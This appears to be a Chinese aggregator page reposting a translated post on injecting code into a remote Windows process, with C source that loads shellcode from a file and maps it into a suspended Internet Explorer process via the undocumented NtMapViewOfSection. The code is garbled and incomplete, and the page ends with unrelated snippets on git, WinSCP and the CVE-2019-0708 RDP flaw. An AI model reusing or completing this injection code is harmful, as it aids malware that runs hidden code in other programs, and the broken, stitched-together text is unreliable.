據說最新的遠端

2021-04-18 00:19:46 字數 1707 閱讀 1633

我研究出了一種新的在遠端程序中執行**的可能性,就是利用乙個未文件函式在遠端程序位址空間寫入**,並且用一種新的技術在遠端程序中執行它,這種技術 完全工作在使用者模式下,並且不需要特殊的條件比如像管理員許可權或者之類的要求。讓原始碼說明一切:(我為我的英文水平感到抱歉,我來自德國)

copy code

#define _win32_winnt 0x0400

#include

typedef long ntstatus, *pntstatus;

#define nt_success(status) ((ntstatus)(status) >= 0)

typedef enum _section_inherit

section_inherit;

typedef ntstatus (__stdcall *func_ntmapviewofsection) ( handle, handle, lpvoid, ulong, size_t, large_integer*, size_t*,  section_inherit, ulong, ulong );

func_ntmapviewofsection ntmapviewofsection = null;

// 轉換偏移量

sectionoffset.lowpart = dwfileoffsetlow;

sectionoffset.highpart = dwfileoffsethigh;

// 儲存大小和起始位址

viewbase = lpbaseaddress;

viewsize = dwnumberofbytestomap;

// 轉換標誌為nt保護屬性

if (dwdesiredaccess & file_map_write)

else if (dwdesiredaccess & file_map_read)

else if (dwdesiredaccess & file_map_copy)

else

//返回起始位址

return viewbase;

}int winapi winmain (hinstance, hinstance, lpstr, int)

{hmodule hdll = loadlibrary( "ntdll.dll" );

ntmapviewofsection = (func_ntmapviewofsection) getprocaddress (hdll, "ntmapviewofsection");

// 取shellcode,任何你想實現的

handle hfile = createfile ("c://shellcode.txt", generic_read, 0, null, open_existing, file_attribute_normal, null);

// 啟動目標程序

startupinfo st;

zeromemory (&st, sizeof(st));

st.cb = sizeof (startupinfo);

process_information pi;

zeromemory (&pi, sizeof(pi));

createprocess ("c://programme//internet explorer//iexplore.exe", null, null, null, false, create_suspended, null, null, &st, &pi);

徹底刪除遠端最新一次提交

如果在操作git時,向遠端推送了一次提交,可事後卻發現本次提交是完全錯誤的,此時的策略就是在別人提交之前徹底移除這次提交。如何操作呢?全恆 lenovo pc mingw64 d git objecttojsonpressuretest master git reset hard head 1 he...

保持遠端目錄最新對話方塊(WinSCP)

檔案使用winscp基本任務 同步 常規 保持遠端目錄最新 在對話方塊中,您可以選擇功能選項保持遠端目錄最新 要顯示該對話方塊,請轉到命令 3e保持遠端目錄最新或者單擊相應的工具欄按鈕。在兩個框中輸入同步的根目錄。預設情況下,將使用當前的工作目錄。在 裡瀏覽器介面在沒有本地工作目錄的情況下,它將是最...

最新遠端桌面漏洞(CVE 2019 0708)演示文稿

漏洞資訊 2019年5月14日微軟官方發布安全補丁,修復了windows遠端桌面服務的遠端 執行漏洞cve 2019 0708 此漏洞是預身份驗證且無需使用者互動 無需驗證系統賬戶密碼 這就意味著此漏洞能夠通過網路蠕蟲的方式被利用。利用方式是通過遠端桌面埠3389,rdp協議進行攻擊。通過rdp協議...